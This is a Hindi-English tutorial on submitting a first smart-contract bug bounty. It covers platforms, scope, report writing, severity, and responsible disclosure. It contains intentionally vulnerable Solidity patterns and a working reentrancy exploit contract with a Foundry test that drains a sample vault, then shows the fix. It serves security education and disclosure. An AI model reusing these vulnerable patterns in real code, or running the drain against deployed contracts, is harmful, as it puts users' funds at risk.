# आपका पहला Bug Bounty Submission — Practical Guide
Smart contract bug bounties में millions paid किए गए हैं — लेकिन पहली बार submit करना intimidating हो सकता है।
यहाँ step-by-step guide है — program चुनने से लेकर payout तक।
1. Program चुनें
Popular Platforms
| Platform | Focus | Payout Speed |
|----------|-------|--------------|
| Immunefi | DeFi protocols | 1-3 months |
| Code4rena | Competitive audits | 2-4 weeks |
| Sherlock | Contest-based | ~3 weeks |
| HackerOne | Mixed (Web2+Web3) | Variable |
Criteria
Beginners के लिए:
- Scope छोटा हो (<5 contracts)
- Documentation अच्छा हो
- Previous reports public हों (learning के लिए)
Example: ERC20 token contracts, simple staking, NFT mints।
2. Scope पढ़ें
Critical: Out-of-scope bugs submit न करें।
In Scope:
✅ Core contracts (Vault.sol, Strategy.sol)
✅ Access control bugs
✅ Economic exploits (price manipulation)
Out of Scope:
❌ Frontend bugs
❌ Known issues (see GitHub issues)
❌ Gas optimizations (unless Critical impact)
3. Bug ढूंढें
Common Patterns
A) Reentrancy
// Vulnerable
function withdraw(uint amount) external {
uint balance = balances[msg.sender];
require(balance >= amount);
// State update AFTER external call ❌
(bool success, ) = msg.sender.call{value: amount}("");
require(success);
balances[msg.sender] -= amount; // Too late!
}
B) Access Control
// Vulnerable
function setOwner(address newOwner) external {
// Missing onlyOwner modifier ❌
owner = newOwner;
}
C) Integer Overflow (pre-0.8.0)
// Vulnerable
function mint(uint amount) external {
totalSupply += amount; // Can overflow ❌
}
D) Price Manipulation
// Vulnerable oracle
function getPrice() public view returns (uint) {
uint reserve0 = token0.balanceOf(address(this));
uint reserve1 = token1.balanceOf(address(this));
return reserve1 * 1e18 / reserve0; // Flash loan attackable ❌
}
4. Write the Report
Template
# [Severity] Title — Brief Impact
Summary
1-2 sentences: What breaks, how?
Vulnerability Details
- Root cause को explain करें
- Code snippet (10-20 lines)
- Line numbers mention करें
Impact
- Who loses money?
- How much?
- Likelihood (High/Medium/Low)
Proof of Concept
Foundry test या step-by-step exploit flow
Recommendation
Fix code suggest करें
Real Example
# [High] Reentrancy in withdraw() allows draining vault
Summary
The withdraw() function updates user balance AFTER external call, allowing reentrancy to drain the vault.
Vulnerability Details
File: Vault.sol, Line 45-52
function withdraw(uint amount) external {
require(balances[msg.sender] >= amount);
(bool success, ) = msg.sender.call{value: amount}("");
require(success);
balances[msg.sender] -= amount; // ❌ State update after call
}
## Impact
- Attacker can drain entire vault balance
- All depositor funds at risk
- Likelihood: High (trivial exploit)
Proof of Concept
contract Exploit {
Vault vault;
uint count;
function attack() external payable {
vault.deposit{value: 1 ether}();
vault.withdraw(1 ether);
}
receive() external payable {
if (count < 10 && address(vault).balance > 0) {
count++;
vault.withdraw(1 ether);
}
}
}
Run:forge test --match-test testReentrancy -vvv
Output: Vault drained ✅
Recommendation
Move state update BEFORE external call:
function withdraw(uint amount) external {
require(balances[msg.sender] >= amount);
balances[msg.sender] -= amount; // ✅ Update first
(bool success, ) = msg.sender.call{value: amount}("");
require(success);
}
Or use ReentrancyGuard.## 5. Severity Triage
Rubric
| Severity | Criteria | Payout Range |
|----------|----------|--------------|
| Critical | Funds directly drained | $50k - $1M+ |
| High | Funds at risk, conditions needed | $10k - $100k |
| Medium | Temporary DoS, minor fund risk | $1k - $10k |
| Low | Informational, unlikely scenario | $0 - $1k |
Be honest: Over-inflating severity = fast rejection।
6. PoC Requirements
Foundry Test (Preferred)
// test/Exploit.t.sol
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
import "../src/Vault.sol";
contract ExploitTest is Test {
Vault vault;
Attacker attacker;
function setUp() public {
vault = new Vault();
attacker = new Attacker(vault);
// Setup initial state
vault.deposit{value: 10 ether}();
}
function testExploit() public {
uint balanceBefore = address(attacker).balance;
attacker.attack{value: 1 ether}();
uint balanceAfter = address(attacker).balance;
// Attacker profit > initial stake
assertGt(balanceAfter, balanceBefore + 1 ether);
}
}
### या Step-by-Step
अगर Foundry test नहीं:
## 7. Communication
Do's
✅ Professional tone
✅ Clear English (broken English OK, लेकिन readable हो)
✅ Respond within 48 hours
✅ Provide extra details if asked
Don'ts
❌ Public disclosure before fix (blacklist हो जाएंगे)
❌ Aggressive tone ("This is Critical! Pay me now!")
❌ Spam multiple programs with same bug
8. Payout Expectations
Timeline
Submit → Triage (1-7 days) → Fix (1-4 weeks) → Payout (2-8 weeks)
### Payment
- Immunefi: USDC/USDT/DAI
- Code4rena: USDC
- Sherlock: USDC
9. Rejection Reasons
Common
Duplicate: Already reported
Out of scope: Frontend bug submitted
Invalid: PoC doesn't work
Low severity: Overestimated impact
Known issue: Acknowledged in docs
Handle Rejection
- Ask for feedback
- Learn from it
- Move to next program
10. First Submission Checklist
- [ ] Program in-scope है?
- [ ] Previous reports पढ़े?
- [ ] PoC working है (local test)?
- [ ] Severity justified है?
- [ ] Grammar check किया (Grammarly)?
- [ ] Code snippets readable हैं?
- [ ] Impact clearly explained है?
Real Success Story
Researcher: Anonymous
Bug: Reentrancy in DeFi vault
Severity: Critical
Payout: $125,000 USDC
Timeline: 6 weeks (submission → payment)
```
Lesson: Simple bugs, well-explained = rewarded।
Conclusion
Bug bounties intimidating लग सकते हैं, लेकिन systematic approach से accessible हैं।
Start छोटे programs से, अच्छी reports लिखें, patience रखें।
पहली bounty के बाद confidence बढ़ेगा — और phir passive income stream बन सकता है।
Happy hunting! 🎯